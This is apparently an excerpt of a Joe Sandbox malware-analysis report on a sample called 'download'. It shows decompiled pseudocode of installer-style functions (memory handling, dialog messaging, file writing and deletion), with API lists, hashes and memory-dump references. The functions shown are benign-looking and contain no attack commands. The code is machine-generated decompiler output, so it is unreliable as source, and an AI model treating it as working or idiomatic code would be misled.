						switch( *((intOrPtr*)(_t43 * 4 +  &M706B25E6))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x706b307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x706b309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E706B1429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x706b405c);
								goto L17;
							case 4:
								__ecx =  *0x706b405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x706b405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x706b405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x706b4000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E706B12D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E706B1266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}














                                                      0x706b24a4
                                                      0x706b24a6
                                                      0x706b24b0
                                                      0x706b24b6
                                                      0x706b24c0
                                                      0x706b24c4
                                                      0x706b24c9
                                                      0x706b24c9
                                                      0x706b24d1
                                                      0x706b24d8
                                                      0x706b24de
                                                      0x00000000
                                                      0x706b24e5
                                                      0x00000000
                                                      0x00000000
                                                      0x706b24ec
                                                      0x706b24f0
                                                      0x706b24f3
                                                      0x706b24f7
                                                      0x706b24fe
                                                      0x706b2502
                                                      0x706b2508
                                                      0x706b250a
                                                      0x706b250c
                                                      0x706b250c
                                                      0x706b2513
                                                      0x00000000
                                                      0x00000000
                                                      0x706b251c
                                                      0x00000000
                                                      0x00000000
                                                      0x706b252c
                                                      0x00000000
                                                      0x00000000
                                                      0x706b2558
                                                      0x706b2560
                                                      0x706b256a
                                                      0x706b256c
                                                      0x706b2571
                                                      0x00000000
                                                      0x00000000
                                                      0x706b2534
                                                      0x706b2538
                                                      0x706b253a
                                                      0x706b253b
                                                      0x706b253d
                                                      0x706b254d
                                                      0x706b2554
                                                      0x00000000
                                                      0x00000000
                                                      0x706b2577
                                                      0x706b2579
                                                      0x706b257f
                                                      0x706b2585
                                                      0x706b2585
                                                      0x00000000
                                                      0x00000000
                                                      0x706b24de
                                                      0x706b2588
                                                      0x706b2588
                                                      0x706b258d
                                                      0x706b259e
                                                      0x706b259e
                                                      0x706b25a4
                                                      0x706b25a9
                                                      0x706b25ae
                                                      0x706b25ba
                                                      0x706b25bf
                                                      0x00000000
                                                      0x706b25c4
                                                      0x706b25b0
                                                      0x706b25b1
                                                      0x706b25c5
                                                      0x706b25c5
                                                      0x706b25ae
                                                      0x706b25c6
                                                      0x706b25ca
                                                      0x706b25cd
                                                      0x706b25e5

                                                      APIs
                                                        • Part of subcall function 706B1215: GlobalAlloc.KERNEL32(00000040,706B1233,?,706B12CF,-706B404B,706B11AB,-000000A0), ref: 706B121D
                                                      • GlobalFree.KERNEL32(?), ref: 706B259E
                                                      • GlobalFree.KERNEL32(00000000), ref: 706B25D8
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1880663434.00000000706B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 706B0000, based on PE: true
                                                      • Associated: 00000002.00000002.1880594487.00000000706B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.1880732550.00000000706B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.1880781272.00000000706B5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_706b0000_download.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$Alloc
                                                      • String ID:
                                                      • API String ID: 1780285237-0
                                                      • Opcode ID: fa37ca8ede957534c4b84db16e7d92aeabf740163e69bf1b0777a9e075933cb6
                                                      • Instruction ID: 3e1716e900e87e64f1c04dc76abefcd1a30c109030028d3b3d7907fb9f2120ab
                                                      • Opcode Fuzzy Hash: fa37ca8ede957534c4b84db16e7d92aeabf740163e69bf1b0777a9e075933cb6
                                                      • Instruction Fuzzy Hash: 5C419EF3204186EFC3229F54CCB8D6E77FBEB89600B304A29F60186290C739AD049B61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040496F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040496F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                      0x0040497d
                                                      0x0040498a
                                                      0x00404990
                                                      0x004049ce
                                                      0x004049ce
                                                      0x004049dd
                                                      0x004049e4
                                                      0x00000000
                                                      0x004049e6
                                                      0x00404992
                                                      0x004049a1
                                                      0x004049a9
                                                      0x004049ac
                                                      0x004049be
                                                      0x004049c4
                                                      0x004049cb
                                                      0x00000000
                                                      0x004049cb
                                                      0x00000000

                                                      APIs
                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040498A
                                                      • GetMessagePos.USER32 ref: 00404992
                                                      • ScreenToClient.USER32(?,?), ref: 004049AC
                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049BE
                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                      • Instruction ID: a28b31c987ffe71ebed06cd45d35d2090213a5ff436324a44693cf4fbc71b07e
                                                      • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                      • Instruction Fuzzy Hash: F7015EB5900219BAEB00DBA5DD85BFFBBBCAF55711F10412BBB51B61C0C7B49901CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 706B22B1 Relevance: 9.1, APIs: 6, Instructions: 140memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E706B22B1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E706B12AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E706B123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M706B243E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E706B12FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E706B12FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E706B1224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x706b405c =  *0x706b405c +  *0x706b405c;
									__edi = GlobalAlloc(0x40,  *0x706b405c +  *0x706b405c);
									 *0x706b405c = MultiByteToWideChar(0, 0, __ebx,  *0x706b405c, __edi,  *0x706b405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E706B12FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x706b405c;
									__esi = __esi +  *0x706b4064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E706B1429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E706B1224(0x706b4034);
					goto L10;
				}
			}












                                                      0x706b22c6
                                                      0x706b22ca
                                                      0x706b22d5
                                                      0x706b22d5
                                                      0x706b22dc
                                                      0x706b22e1
                                                      0x00000000
                                                      0x00000000
                                                      0x706b22e5
                                                      0x706b22e8
                                                      0x00000000
                                                      0x00000000
                                                      0x706b22ed
                                                      0x706b22f8
                                                      0x706b2308
                                                      0x706b22ff
                                                      0x706b2301
                                                      0x706b2317
                                                      0x706b2317
                                                      0x00000000
                                                      0x706b22ef
                                                      0x706b22ef
                                                      0x706b2318
                                                      0x706b231c
                                                      0x706b231e
                                                      0x706b231e
                                                      0x706b2321
                                                      0x706b2321
                                                      0x706b2329
                                                      0x706b232c
                                                      0x706b2333
                                                      0x706b2337
                                                      0x706b2406
                                                      0x706b2407
                                                      0x706b2412
                                                      0x706b243d
                                                      0x706b243d
                                                      0x706b2422
                                                      0x706b242e
                                                      0x706b2424
                                                      0x706b2424
                                                      0x706b2424
                                                      0x00000000
                                                      0x706b233d
                                                      0x706b233d
                                                      0x00000000
                                                      0x706b2344
                                                      0x00000000
                                                      0x00000000
                                                      0x706b234d
                                                      0x00000000
                                                      0x00000000
                                                      0x706b235b
                                                      0x706b235e
                                                      0x00000000
                                                      0x00000000
                                                      0x706b2367
                                                      0x706b236c
                                                      0x706b236f
                                                      0x706b2370
                                                      0x00000000
                                                      0x00000000
                                                      0x706b237d
                                                      0x706b2388
                                                      0x706b2397
                                                      0x706b23a2
                                                      0x706b23c5
                                                      0x706b23c8
                                                      0x706b23a4
                                                      0x706b23a8
                                                      0x706b23ae
                                                      0x706b23af
                                                      0x706b23b2
                                                      0x706b23b3
                                                      0x706b23b6
                                                      0x706b23bd
                                                      0x706b23bd
                                                      0x00000000
                                                      0x00000000
                                                      0x706b23d0
                                                      0x706b23d3
                                                      0x706b23df
                                                      0x706b23e1
                                                      0x00000000
                                                      0x00000000
                                                      0x706b23e4
                                                      0x706b23e7
                                                      0x706b23e8
                                                      0x706b23ef
                                                      0x706b23f6
                                                      0x706b23f9
                                                      0x706b23fb
                                                      0x706b23fe
                                                      0x00000000
                                                      0x00000000
                                                      0x706b233d
                                                      0x706b2337
                                                      0x706b230d
                                                      0x706b2312
                                                      0x00000000
                                                      0x706b2312

                                                      APIs
                                                      • GlobalFree.KERNEL32(00000000), ref: 706B2407
                                                        • Part of subcall function 706B1224: lstrcpynA.KERNEL32(00000000,?,706B12CF,-706B404B,706B11AB,-000000A0), ref: 706B1234
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 706B2382
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 706B2397
                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 706B23A8
                                                      • CLSIDFromString.OLE32(00000000,00000000), ref: 706B23B6
                                                      • GlobalFree.KERNEL32(00000000), ref: 706B23BD
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1880663434.00000000706B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 706B0000, based on PE: true
                                                      • Associated: 00000002.00000002.1880594487.00000000706B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.1880732550.00000000706B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.1880781272.00000000706B5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_706b0000_download.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                      • String ID:
                                                      • API String ID: 3730416702-0
                                                      • Opcode ID: 4cd094950ff108f6faca9809cec7550df30d3c200c5b12e88587f7797578ee6a
                                                      • Instruction ID: 53da56f3f976d8801fe98dfa257cc1ab947cd491b0cb45c4e2a0a1303b2bc924
                                                      • Opcode Fuzzy Hash: 4cd094950ff108f6faca9809cec7550df30d3c200c5b12e88587f7797578ee6a
                                                      • Instruction Fuzzy Hash: 9B4179F1508382AFD3119F21D864B6EB7EAFF44311F30492AF546CA6C0D778A985CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040273C Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 37%
                                                      			E0040273C(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402ACB(0xfffffff0);
				 *(_t56 - 0x34) = _t23;
				if(E00405982(_t50) == 0) {
					E00402ACB(0xffffffed);
				}
				E00405AF1(_t50);
				_t26 = E00405B16(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x7a2f58; // 0x3fc00
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E004031A1(_t45);
						E0040318B(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x3c) = _t54;
						if(_t54 != _t45) {
							_push( *(_t56 - 0x20));
							_push(_t54);
							_push(_t45);
							_push( *((intOrPtr*)(_t56 - 0x24)));
							E00402F9C();
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x84) =  *_t54;
								E00405AD1( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x84);
							}
							GlobalFree( *(_t56 - 0x3c));
						}
						E00405BBD( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						_push(_t45);
						_push(_t45);
						_push( *(_t56 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t56 - 0xc)) = E00402F9C();
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x34));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                      0x0040273c
                                                      0x0040273e
                                                      0x0040274a
                                                      0x0040274d
                                                      0x00402757
                                                      0x0040275b
                                                      0x0040275b
                                                      0x00402761
                                                      0x0040276e
                                                      0x00402776
                                                      0x00402779
                                                      0x0040277f
                                                      0x0040278d
                                                      0x00402792
                                                      0x00402796
                                                      0x00402799
                                                      0x004027a2
                                                      0x004027ae
                                                      0x004027b2
                                                      0x004027b5
                                                      0x004027b7
                                                      0x004027ba
                                                      0x004027bb
                                                      0x004027bc
                                                      0x004027bf
                                                      0x004027e4
                                                      0x004027c6
                                                      0x004027cb
                                                      0x004027d3
                                                      0x004027d9
                                                      0x004027de
                                                      0x004027de
                                                      0x004027eb
                                                      0x004027eb
                                                      0x004027f8
                                                      0x004027fe
                                                      0x00402804
                                                      0x00402805
                                                      0x00402806
                                                      0x00402809
                                                      0x00402810
                                                      0x00402810
                                                      0x00402816
                                                      0x00402816
                                                      0x00402821
                                                      0x00402822
                                                      0x00402826
                                                      0x0040282a
                                                      0x00402830
                                                      0x00402830
                                                      0x00402837
                                                      0x0040223d
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,0003FC00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
                                                      • GlobalFree.KERNEL32(?), ref: 004027EB
                                                      • GlobalFree.KERNEL32(00000000), ref: 004027FE
                                                      • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
                                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                      • String ID:
                                                      • API String ID: 2667972263-0
                                                      • Opcode ID: 74498b9771c20a0aa9e24b593dedaeec913bd55a0e575eb972961abdc8cc0048
                                                      • Instruction ID: a3aa65fdc26674a25697bbf1b98d1dc7df5c11bc78c453e7b8258ed70cc26f26
                                                      • Opcode Fuzzy Hash: 74498b9771c20a0aa9e24b593dedaeec913bd55a0e575eb972961abdc8cc0048
                                                      • Instruction Fuzzy Hash: 41219F71800124BBDF207FA5CE89DAE7B79AF49364F14823AF510762E0CB794D419F68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00401D41(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x48);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402ACB(_t21), _t21,  *(_t27 - 0x40) *  *(_t27 - 0x20),  *(_t27 - 0x3c) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                      0x00401d4b
                                                      0x00401d52
                                                      0x00401d81
                                                      0x00401d89
                                                      0x00401d90
                                                      0x00401d90
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • GetDlgItem.USER32(?), ref: 00401D45
                                                      • GetClientRect.USER32(00000000,?), ref: 00401D52
                                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
                                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
                                                      • DeleteObject.GDI32(00000000), ref: 00401D90
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      • Opcode ID: bf334a0d68def9d539a0386b9da46a64024a4d055d9233935bf9dbd7a5019d3b
                                                      • Instruction ID: 86ae4d2b40e720423d53cfa3fe8a52c583987269cec1c9f3ad3a23d9d9d7ea30
                                                      • Opcode Fuzzy Hash: bf334a0d68def9d539a0386b9da46a64024a4d055d9233935bf9dbd7a5019d3b
                                                      • Instruction Fuzzy Hash: F6F0AFB2600515BFDB01EBE4DE89DEFB7BCEB44345B14446AF641F6191CA749D018B38
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404865 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E00404865(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405F9F(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405F9F(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405F9F(_t41, _t47, 0x79f540, 0x79f540, _a8);
				wsprintfA(_t32 + lstrlenA(0x79f540), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x7a2718, _a4, 0x79f540);
			}



















                                                      0x0040486b
                                                      0x00404870
                                                      0x00404878
                                                      0x00404879
                                                      0x00404886
                                                      0x0040488e
                                                      0x0040488f
                                                      0x00404891
                                                      0x00404893
                                                      0x00404895
                                                      0x00404898
                                                      0x00404898
                                                      0x0040489f
                                                      0x004048a5
                                                      0x004048a5
                                                      0x004048ac
                                                      0x004048b3
                                                      0x004048b6
                                                      0x004048b9
                                                      0x004048b9
                                                      0x004048bd
                                                      0x004048cd
                                                      0x004048cf
                                                      0x004048d2
                                                      0x0040487b
                                                      0x0040487b
                                                      0x00404882
                                                      0x00404882
                                                      0x004048da
                                                      0x004048e5
                                                      0x004048fb
                                                      0x0040490b
                                                      0x00404927

                                                      APIs
                                                      • lstrlenA.KERNEL32(0079F540,0079F540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404780,000000DF,00000000,00000400,-007A4000), ref: 00404903
                                                      • wsprintfA.USER32 ref: 0040490B
                                                      • SetDlgItemTextA.USER32(?,0079F540), ref: 0040491E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
